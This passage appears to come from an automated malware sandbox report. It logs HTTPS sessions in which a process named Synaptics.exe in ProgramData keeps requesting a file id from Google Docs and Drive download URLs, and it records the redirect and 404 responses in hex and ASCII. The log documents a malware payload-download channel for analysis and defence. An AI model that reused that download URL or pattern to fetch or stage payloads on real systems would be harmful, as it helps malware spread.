                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    36192.168.2.449790142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6bEe6qFJ4wXzFo13yz72806FfsyvYVNqtF5LBh_pJ6BRD0hqcXh1VeRR1MXvtRqMYcpHRR5HE
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:11 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z47sSC0vBrXnPrD6MAJGHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:11 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 59 76 71 62 52 5f 61 39 65 69 62 6c 74 62 68 37 4b 2d 69 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="IYvqbR_a9eibltbh7K-i8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:11 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    37192.168.2.449791142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:11 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-id8y3ZAVCujZ5r8n4vpyNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    38192.168.2.449792142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:11 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Xtq3ReuDDuQ7jxFdNwXDdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    39192.168.2.449793142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6b-JUp5DhulV0t385j-DzczO15Chdbayjw6A-6Ygyr1K_eTqq33dZlLaeAm8vQOeeF
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:11 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-054_2RfPIxRIgBxrki0b8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:11 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:11 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 6d 72 63 33 55 67 6a 55 5f 4d 68 67 67 72 64 50 70 43 69 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="Emrc3UgjU_MhggrdPpCiGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    40192.168.2.451918142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:50 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7KZL-fm-mSdu0iRmwvm_5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    41192.168.2.451919142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:50 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fi6iuj95Sw-TjJZga_mwRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    42192.168.2.451931142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7dr2hh2geiD-DayahNTyJfr6aTD0wyqoCDeRygh9wfGKu7rp-CDD8hKH-sEVgj2lrU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:51 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7kV0wjeYvlWSzwqQq-_Lkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 39 35 52 53 31 6d 76 65 64 37 6d 53 71 74 4b 62 45 35 2d 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="x95RS1mved7mSqtKbE5--Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    43192.168.2.451928142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
